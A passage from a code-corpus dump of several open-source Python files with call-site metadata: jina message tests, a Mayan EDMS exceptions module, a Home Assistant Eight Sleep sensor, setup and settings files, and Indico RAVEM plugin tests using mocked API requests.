foo_handler(required_arg): pass self.radio.reply('foo', foo_handler) with self.assertRaises(TypeError): self.radio.request('foo') suite = TestLoader().loadTestsFromTestCase(TestRadioRequestReplyMethods)
[((12, 21, 12, 28), 'radio.Radio', 'Radio', ({}, {}), '()', False, 'from radio import Radio, ListenerNotFound, ReplyHandlerAlreadyBound, HandlerAlreadyBound\n'), ((106, 8, 106, 20), 'unittest.TestLoader', 'TestLoader', ({}, {}), '()', False, 'from unittest import TestCase, TestLoader\n')]
sophiawa/Mayan-EDMS
mayan/apps/rest_api/exceptions.py
42f20576d0c690b645a60bf53c5169cda4264231
class APIError(Exception):
    """
    Base exception for the API app
    """
    pass


class APIResourcePatternError(APIError):
    """
    Raised when an app tries to override an existing URL regular expression
    pattern
    """
    pass
[]
Immich/jina
tests/unit/types/message/test_message.py
1f5f7cf4d82029d76ab41df157526fe6f6e0da50
import sys from typing import Sequence import pytest from jina import Request, QueryLang, Document from jina.clients.request import request_generator from jina.proto import jina_pb2 from jina.proto.jina_pb2 import EnvelopeProto from jina.types.message import Message from jina.types.request import _trigger_fields from tests import random_docs @pytest.mark.parametrize('field', _trigger_fields.difference({'command', 'args', 'flush'})) def test_lazy_access(field): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # access r.train print(getattr(r, field)) # now it is read assert r.is_used def test_multiple_access(): reqs = [Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))] for r in reqs: assert not r.is_used assert r assert not r.is_used for r in reqs: assert not r.is_used assert r.index assert r.is_used def test_lazy_nest_access(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # write access r.train r.docs[0].id = '1' * 16 # now it is read assert r.is_used assert r.index.docs[0].id == '1' * 16 def test_lazy_change_message_type(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # write access r.train r.control.command = jina_pb2.RequestProto.ControlRequestProto.IDLE # now it is read assert r.is_used assert len(r.index.docs) == 0 def test_lazy_append_access(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used r.request_type = 'index' # write access r.train r.docs.append(Document()) # now it is read assert r.is_used def test_lazy_clear_access(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # write access r.train r.ClearField('index') # now it is read assert r.is_used def test_lazy_nested_clear_access(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert not r.is_used # write access r.train r.index.ClearField('docs') # now it is read assert r.is_used def test_lazy_msg_access(): reqs = [Message(None, r.SerializeToString(), 'test', '123', request_id='123', request_type='IndexRequest') for r in request_generator(random_docs(10))] for r in reqs: assert not r.request.is_used assert r.envelope assert len(r.dump()) == 3 assert not r.request.is_used for r in reqs: assert not r.request.is_used assert r.request assert len(r.dump()) == 3 assert not r.request.is_used for r in reqs: assert not r.request.is_used assert r.request.index.docs assert len(r.dump()) == 3 assert r.request.is_used def test_message_size(): reqs = [Message(None, r, 'test', '123') for r in request_generator(random_docs(10))] for r in reqs: assert r.size == 0 assert sys.getsizeof(r.envelope.SerializeToString()) assert sys.getsizeof(r.request.SerializeToString()) assert len(r.dump()) == 3 assert r.size > sys.getsizeof(r.envelope.SerializeToString()) \ + sys.getsizeof(r.request.SerializeToString()) def test_lazy_request_fields(): reqs = (Request(r.SerializeToString(), EnvelopeProto()) for r in request_generator(random_docs(10))) for r in reqs: assert list(r.DESCRIPTOR.fields_by_name.keys()) def test_request_extend_queryset(): q1 = {'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}} q2 
= QueryLang({'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}, 'priority': 1}) q3 = jina_pb2.QueryLangProto() q3.name = 'SliceQL' q3.parameters['start'] = 3 q3.parameters['end'] = 4 q3.priority = 2 r = Request() r.queryset.extend([q1, q2, q3]) assert isinstance(r.queryset, Sequence) assert len(r.queryset) == 3 for idx, q in enumerate(r.queryset): assert q.priority == idx assert q.parameters['start'] == 3 assert q.parameters['end'] == 4 # q1 and q2 refer to the same assert len({id(q) for q in r.queryset}) == 2 r2 = Request() r2.queryset.extend(r.queryset) assert len({id(q) for q in r2.queryset}) == 2 r = Request() r.queryset.append(q1) r.queryset.append(q2) r.queryset.append(q3) for idx, q in enumerate(r.queryset): assert q.priority == idx assert q.parameters['start'] == 3 assert q.parameters['end'] == 4 with pytest.raises(TypeError): r.queryset.extend(1) @pytest.mark.parametrize('typ,pb_typ', [('train', jina_pb2.RequestProto.TrainRequestProto), ('index', jina_pb2.RequestProto.IndexRequestProto), ('search', jina_pb2.RequestProto.SearchRequestProto), ('control', jina_pb2.RequestProto.ControlRequestProto)]) def test_empty_request_type(typ, pb_typ): r = Request() assert r.request_type is None with pytest.raises(ValueError): print(r.body) r.request_type = typ assert r._request_type == typ assert isinstance(r.body, pb_typ) @pytest.mark.parametrize('typ,pb_typ', [('index', jina_pb2.RequestProto.IndexRequestProto), ('search', jina_pb2.RequestProto.SearchRequestProto)]) def test_add_doc_to_type(typ, pb_typ): r = Request() r.request_type = typ for _ in range(10): r.docs.append(Document()) r.groundtruths.append(Document()) assert len(r.docs) == 10 assert len(r.groundtruths) == 10
[((170, 1, 173, 96), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(170, 25, 170, 37): '"""typ,pb_typ"""', (170, 39, 173, 95): "[('train', jina_pb2.RequestProto.TrainRequestProto), ('index', jina_pb2.\n RequestProto.IndexRequestProto), ('search', jina_pb2.RequestProto.\n SearchRequestProto), ('control', jina_pb2.RequestProto.ControlRequestProto)\n ]"}, {}), "('typ,pb_typ', [('train', jina_pb2.RequestProto.\n TrainRequestProto), ('index', jina_pb2.RequestProto.IndexRequestProto),\n ('search', jina_pb2.RequestProto.SearchRequestProto), ('control',\n jina_pb2.RequestProto.ControlRequestProto)])", False, 'import pytest\n'), ((185, 1, 186, 94), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(185, 25, 185, 37): '"""typ,pb_typ"""', (185, 39, 186, 93): "[('index', jina_pb2.RequestProto.IndexRequestProto), ('search', jina_pb2.\n RequestProto.SearchRequestProto)]"}, {}), "('typ,pb_typ', [('index', jina_pb2.RequestProto.\n IndexRequestProto), ('search', jina_pb2.RequestProto.SearchRequestProto)])", False, 'import pytest\n'), ((15, 34, 15, 90), 'jina.types.request._trigger_fields.difference', '_trigger_fields.difference', ({(15, 61, 15, 89): "{'command', 'args', 'flush'}"}, {}), "({'command', 'args', 'flush'})", False, 'from jina.types.request import _trigger_fields\n'), ((135, 9, 135, 92), 'jina.QueryLang', 'QueryLang', ({(135, 19, 135, 91): "{'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4}, 'priority': 1}"}, {}), "({'name': 'SliceQL', 'parameters': {'start': 3, 'end': 4},\n 'priority': 1})", False, 'from jina import Request, QueryLang, Document\n'), ((136, 9, 136, 34), 'jina.proto.jina_pb2.QueryLangProto', 'jina_pb2.QueryLangProto', ({}, {}), '()', False, 'from jina.proto import jina_pb2\n'), ((141, 8, 141, 17), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((153, 9, 153, 18), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((157, 8, 157, 17), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((175, 8, 175, 17), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((188, 8, 188, 17), 'jina.Request', 'Request', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((117, 12, 117, 43), 'jina.types.message.Message', 'Message', ({(117, 20, 117, 24): 'None', (117, 26, 117, 27): 'r', (117, 29, 117, 35): '"""test"""', (117, 37, 117, 42): '"""123"""'}, {}), "(None, r, 'test', '123')", False, 'from jina.types.message import Message\n'), ((166, 9, 166, 33), 'pytest.raises', 'pytest.raises', ({(166, 23, 166, 32): 'TypeError'}, {}), '(TypeError)', False, 'import pytest\n'), ((177, 9, 177, 34), 'pytest.raises', 'pytest.raises', ({(177, 23, 177, 33): 'ValueError'}, {}), '(ValueError)', False, 'import pytest\n'), ((17, 43, 17, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((29, 43, 29, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((42, 43, 42, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((53, 43, 53, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((64, 43, 64, 58), 'jina.proto.jina_pb2.EnvelopeProto', 
'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((69, 22, 69, 32), 'jina.Document', 'Document', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((75, 43, 75, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((85, 43, 85, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((128, 43, 128, 58), 'jina.proto.jina_pb2.EnvelopeProto', 'EnvelopeProto', ({}, {}), '()', False, 'from jina.proto.jina_pb2 import EnvelopeProto\n'), ((191, 22, 191, 32), 'jina.Document', 'Document', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((192, 30, 192, 40), 'jina.Document', 'Document', ({}, {}), '()', False, 'from jina import Request, QueryLang, Document\n'), ((17, 87, 17, 102), 'tests.random_docs', 'random_docs', ({(17, 99, 17, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((29, 87, 29, 102), 'tests.random_docs', 'random_docs', ({(29, 99, 29, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((42, 87, 42, 102), 'tests.random_docs', 'random_docs', ({(42, 99, 42, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((53, 87, 53, 102), 'tests.random_docs', 'random_docs', ({(53, 99, 53, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((64, 87, 64, 102), 'tests.random_docs', 'random_docs', ({(64, 99, 64, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((75, 87, 75, 102), 'tests.random_docs', 'random_docs', ({(75, 99, 75, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((85, 87, 85, 102), 'tests.random_docs', 'random_docs', ({(85, 99, 85, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((96, 94, 96, 109), 'tests.random_docs', 'random_docs', ({(96, 106, 96, 108): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((117, 71, 117, 86), 'tests.random_docs', 'random_docs', ({(117, 83, 117, 85): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n'), ((128, 87, 128, 102), 'tests.random_docs', 'random_docs', ({(128, 99, 128, 101): '(10)'}, {}), '(10)', False, 'from tests import random_docs\n')]
MrMonk3y/vimrc
tabnine-vim/third_party/ycmd/ycmd/tests/python/testdata/project/settings_extra_conf.py
950230fb3fd7991d1234c2ab516ec03245945677
import os
import sys

DIR_OF_THIS_SCRIPT = os.path.abspath( os.path.dirname( __file__ ) )


def Settings( **kwargs ):
  return {
    'interpreter_path': sys.executable,
    'sys_path': [ os.path.join( DIR_OF_THIS_SCRIPT, 'third_party' ) ]
  }
[((4, 38, 4, 65), 'os.path.dirname', 'os.path.dirname', ({(4, 55, 4, 63): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((10, 18, 10, 67), 'os.path.join', 'os.path.join', ({(10, 32, 10, 50): 'DIR_OF_THIS_SCRIPT', (10, 52, 10, 65): '"""third_party"""'}, {}), "(DIR_OF_THIS_SCRIPT, 'third_party')", False, 'import os\n')]
Cloud-PG/smart-cache
SmartCache/sim/Utilities/setup.py
467987abece3fd4830fd615288046359761229f8
from distutils.core import setup

setup(
    name='utils',
    version='1.0.0',
    author='Mirco Tracolli',
    author_email='[email protected]',
    packages=[
        'utils',
    ],
    scripts=[],
    url='https://github.com/Cloud-PG/smart-cache',
    license='Apache 2.0 License',
    description='Utils for the SmartCache project',
    long_description="To do...",
    install_requires=open("requirements.txt").read(),
    classifier=[
        "Operating System :: POSIX :: Linux",
        "License :: OSI Approved :: Apache 2.0 License",
        "Programming Language :: Python :: 3 :: Only"
    ]
)
[]
liangleslie/core
homeassistant/components/eight_sleep/binary_sensor.py
cc807b4d597daaaadc92df4a93c6e30da4f570c6
"""Support for Eight Sleep binary sensors.""" from __future__ import annotations import logging from pyeight.eight import EightSleep from homeassistant.components.binary_sensor import ( BinarySensorDeviceClass, BinarySensorEntity, ) from homeassistant.core import HomeAssistant from homeassistant.helpers.entity_platform import AddEntitiesCallback from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType from homeassistant.helpers.update_coordinator import DataUpdateCoordinator from . import EightSleepBaseEntity from .const import DATA_API, DATA_HEAT, DOMAIN _LOGGER = logging.getLogger(__name__) async def async_setup_platform( hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: DiscoveryInfoType | None = None, ) -> None: """Set up the eight sleep binary sensor.""" if discovery_info is None: return eight: EightSleep = hass.data[DOMAIN][DATA_API] heat_coordinator: DataUpdateCoordinator = hass.data[DOMAIN][DATA_HEAT] entities = [] for user in eight.users.values(): entities.append( EightHeatSensor(heat_coordinator, eight, user.userid, "bed_presence") ) async_add_entities(entities) class EightHeatSensor(EightSleepBaseEntity, BinarySensorEntity): """Representation of a Eight Sleep heat-based sensor.""" _attr_device_class = BinarySensorDeviceClass.OCCUPANCY def __init__( self, coordinator: DataUpdateCoordinator, eight: EightSleep, user_id: str | None, sensor: str, ) -> None: """Initialize the sensor.""" super().__init__(coordinator, eight, user_id, sensor) assert self._user_obj _LOGGER.debug( "Presence Sensor: %s, Side: %s, User: %s", sensor, self._user_obj.side, user_id, ) @property def is_on(self) -> bool: """Return true if the binary sensor is on.""" assert self._user_obj return bool(self._user_obj.bed_presence)
[((20, 10, 20, 37), 'logging.getLogger', 'logging.getLogger', ({(20, 28, 20, 36): '__name__'}, {}), '(__name__)', False, 'import logging\n')]
bpedersen2/indico-plugins-cern
ravem/tests/util_test.py
c4f06d11d981c316fc8de2892758484deb58e2f5
# This file is part of the CERN Indico plugins. # Copyright (C) 2014 - 2022 CERN # # The CERN Indico plugins are free software; you can redistribute # them and/or modify them under the terms of the MIT License; see # the LICENSE file for more details. from unittest.mock import MagicMock import pytest from requests.exceptions import HTTPError, Timeout from indico.testing.util import extract_logs from indico_ravem.plugin import RavemPlugin from indico_ravem.util import has_access, ravem_api_call @pytest.mark.usefixtures('db') @pytest.mark.parametrize('method', ('get', 'post')) def test_correct_http_method(mocker, method): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', method=method, param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[0][0] == method @pytest.mark.usefixtures('db') def test_correct_auth_method(mocker): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response token = 'foo' RavemPlugin.settings.set('access_token', token) ravem_api_call('test_endpoint', param1='test1', param2='test2') assert request.call_count == 1 assert 'Authorization' in request.call_args[1]['headers'] assert request.call_args[1]['headers']['Authorization'] == 'Bearer %s' % token @pytest.mark.usefixtures('db') def test_accepts_json(mocker): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[1]['headers']['Accept'] == 'application/json' @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('root_endpoint', 'endpoint', 'expected_url'), ( ('https://ravem.test/', 'final_endpoint', 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/', 'final_endpoint', 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/', 'final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test', './final_endpoint', 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/', './final_endpoint', 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/', './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test', 'sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/', 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), ('https://ravem.test/api/v2/', 'sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test', './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/', './sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), ('https://ravem.test/api/v2/', './sub/final_endpoint', 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/', '', 'https://ravem.test/'), ('https://ravem.test/api/', '', 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '', 'https://ravem.test/api/v2/'), )) def test_correct_api_endpoint(mocker, root_endpoint, endpoint, expected_url): request = mocker.patch('indico_ravem.util.requests.request') response = 
MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response RavemPlugin.settings.set('api_endpoint', root_endpoint) ravem_api_call(endpoint, param1='test1', param2='test2') assert request.call_count == 1 assert request.call_args[0][1] == expected_url @pytest.mark.usefixtures('db') @pytest.mark.parametrize('params', ( {}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'} )) def test_params_generated(mocker, params): request = mocker.patch('indico_ravem.util.requests.request') response = MagicMock() response.json.return_value = {'result': 'test'} response.raise_for_status.return_value = False request.return_value = response ravem_api_call('test_endpoint', params=params) assert request.call_count == 1 assert request.call_args[1]['params'] == params @pytest.mark.usefixtures('db') def test_raises_timeout(mocker): request = mocker.patch('indico_ravem.util.requests.request') request.side_effect = Timeout('Timeout test error message', request=request) with pytest.raises(Timeout) as excinfo: ravem_api_call('test_endpoint') assert str(excinfo.value) == "Timeout while contacting the room." assert request.call_count == 1 @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('method', 'params'), ( ('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2': '2ndparam'}) )) def test_unexpected_exception_is_logged(mocker, caplog, method, params): request = mocker.patch('indico_ravem.util.requests.request') request.side_effect = IndexError('this is unexpected') with pytest.raises(IndexError) as excinfo: ravem_api_call('test_endpoint', method=method, **params) assert str(excinfo.value) == 'this is unexpected' log = extract_logs(caplog, one=True, name='indico.plugin.ravem') assert log.message == "failed call: {} {} with {}: {}".format(method.upper(), 'test_endpoint', params, 'this is unexpected') assert request.call_count == 1 @pytest.mark.usefixtures('db') @pytest.mark.parametrize(('method', 'params'), ( ('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2': '2ndparam'}) )) def test_http_error_is_logged(mocker, caplog, method, params): request = mocker.patch('indico_ravem.util.requests.request') request.method = method.upper() request.url = RavemPlugin.settings.get('api_endpoint') + 'test_endpoint' response = MagicMock() response.raise_for_status.side_effect = HTTPError('Well this is embarrassing') response.request = request response.url = response.request.url request.return_value = response with pytest.raises(HTTPError) as excinfo: ravem_api_call('test_endpoint', method=method, **params) assert str(excinfo.value) == 'Well this is embarrassing' log = extract_logs(caplog, one=True, name='indico.plugin.ravem') assert log.message == '{} {} failed with {}'.format( method.upper(), RavemPlugin.settings.get('api_endpoint') + 'test_endpoint', 'Well this is embarrassing') assert request.call_count == 1 @pytest.mark.usefixtures('db') def test_unlinked_event_vc_room_has_no_access(): event_vc_room = MagicMock() event_vc_room.link_object = None assert not has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_unlinked_room_has_no_access(mocker): session = mocker.patch('indico_ravem.util.session') session.user = 'Guinea Pig' event_vc_room = MagicMock() event_vc_room.link_object.room = None 
assert not has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_check_if_current_user_is_room_owner(mocker): session = mocker.patch('indico_ravem.util.session') session.user = 'Guinea Pig' request = mocker.patch('indico_ravem.util.request') request.remote_addr = '111.222.123.123' retrieve_principal = mocker.patch('indico_ravem.util._retrieve_principal') retrieve_principal.side_effect = lambda x: session.user event_vc_room = MagicMock() event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True) event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr event_vc_room.vc_room.data.get.return_value = 'User:123' event_vc_room.event.can_manage.return_value = False assert has_access(event_vc_room) @pytest.mark.usefixtures('db', 'request_context') def test_check_if_current_user_can_modify(mocker): request = mocker.patch('indico_ravem.util.request') request.remote_addr = '111.222.123.123' session = mocker.patch('indico_ravem.util.session') session.user = 'Guinea Pig' mocker.patch('indico_ravem.util._retrieve_principal') event_vc_room = MagicMock() event_vc_room.link_object.room.has_equipment = MagicMock(return_value=True) event_vc_room.link_object.room.get_attribute_value.return_value = request.remote_addr event_vc_room.event.can_manage.return_value = True assert has_access(event_vc_room) event_vc_room.event.can_manage.assert_called_once_with(session.user)
[((19, 1, 19, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(19, 25, 19, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((20, 1, 20, 51), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(20, 25, 20, 33): '"""method"""', (20, 35, 20, 50): "('get', 'post')"}, {}), "('method', ('get', 'post'))", False, 'import pytest\n'), ((34, 1, 34, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(34, 25, 34, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((51, 1, 51, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(51, 25, 51, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((65, 1, 65, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(65, 25, 65, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((66, 1, 82, 2), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(66, 25, 66, 70): "('root_endpoint', 'endpoint', 'expected_url')", (66, 72, 82, 1): "(('https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), ('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/'))"}, {}), "(('root_endpoint', 'endpoint', 'expected_url'), ((\n 'https://ravem.test/', 'final_endpoint',\n 'https://ravem.test/final_endpoint'), ('https://ravem.test/api/',\n 'final_endpoint', 'https://ravem.test/api/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'final_endpoint',\n 'https://ravem.test/api/v2/final_endpoint'), ('https://ravem.test',\n './final_endpoint', 'https://ravem.test/final_endpoint'), (\n 'https://ravem.test/api/', './final_endpoint',\n 'https://ravem.test/api/final_endpoint'), ('https://ravem.test/api/v2/',\n './final_endpoint', 'https://ravem.test/api/v2/final_endpoint'), (\n 'https://ravem.test', 'sub/final_endpoint',\n 'https://ravem.test/sub/final_endpoint'), ('https://ravem.test/api/',\n 'sub/final_endpoint', 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', 'sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test',\n './sub/final_endpoint', 'https://ravem.test/sub/final_endpoint'), (\n 'https://ravem.test/api/', './sub/final_endpoint',\n 'https://ravem.test/api/sub/final_endpoint'), (\n 'https://ravem.test/api/v2/', './sub/final_endpoint',\n 'https://ravem.test/api/v2/sub/final_endpoint'), ('https://ravem.test/',\n '', 'https://ravem.test/'), 
('https://ravem.test/api/', '',\n 'https://ravem.test/api/'), ('https://ravem.test/api/v2/', '',\n 'https://ravem.test/api/v2/')))", False, 'import pytest\n'), ((97, 1, 97, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(97, 25, 97, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((98, 1, 102, 2), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(98, 25, 98, 33): '"""params"""', (98, 35, 102, 1): "({}, {'p1': '1stparam'}, {'p1': '1stparam', 'p2': '2ndparam'})"}, {}), "('params', ({}, {'p1': '1stparam'}, {'p1':\n '1stparam', 'p2': '2ndparam'}))", False, 'import pytest\n'), ((116, 1, 116, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(116, 25, 116, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((128, 1, 128, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(128, 25, 128, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((129, 1, 136, 2), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(129, 25, 129, 45): "('method', 'params')", (129, 47, 136, 1): "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"}, {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))", False, 'import pytest\n'), ((151, 1, 151, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(151, 25, 151, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((152, 1, 159, 2), 'pytest.mark.parametrize', 'pytest.mark.parametrize', ({(152, 25, 152, 45): "('method', 'params')", (152, 47, 159, 1): "(('get', {}), ('post', {}), ('get', {'p1': '1stparam'}), ('post', {'p1':\n '1stparam'}), ('get', {'p1': '1stparam', 'p2': '2ndparam'}), ('post', {\n 'p1': '1stparam', 'p2': '2ndparam'}))"}, {}), "(('method', 'params'), (('get', {}), ('post', {}), (\n 'get', {'p1': '1stparam'}), ('post', {'p1': '1stparam'}), ('get', {'p1':\n '1stparam', 'p2': '2ndparam'}), ('post', {'p1': '1stparam', 'p2':\n '2ndparam'})))", False, 'import pytest\n'), ((181, 1, 181, 30), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(181, 25, 181, 29): '"""db"""'}, {}), "('db')", False, 'import pytest\n'), ((189, 1, 189, 49), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(189, 25, 189, 29): '"""db"""', (189, 31, 189, 48): '"""request_context"""'}, {}), "('db', 'request_context')", False, 'import pytest\n'), ((200, 1, 200, 49), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(200, 25, 200, 29): '"""db"""', (200, 31, 200, 48): '"""request_context"""'}, {}), "('db', 'request_context')", False, 'import pytest\n'), ((218, 1, 218, 49), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', ({(218, 25, 218, 29): '"""db"""', (218, 31, 218, 48): '"""request_context"""'}, {}), "('db', 'request_context')", False, 'import pytest\n'), ((23, 15, 23, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((28, 4, 28, 82), 'indico_ravem.util.ravem_api_call', 'ravem_api_call', (), '', False, 'from indico_ravem.util import has_access, ravem_api_call\n'), ((37, 15, 37, 26), 'unittest.mock.MagicMock', 'MagicMock', ({}, {}), '()', False, 'from unittest.mock import MagicMock\n'), ((43, 4, 43, 51), 'indico_ravem.plugin.RavemPlugin.settings.set', 'RavemPlugin.settings.set', ({(43, 29, 43, 43): '"""access_token"""', (43, 
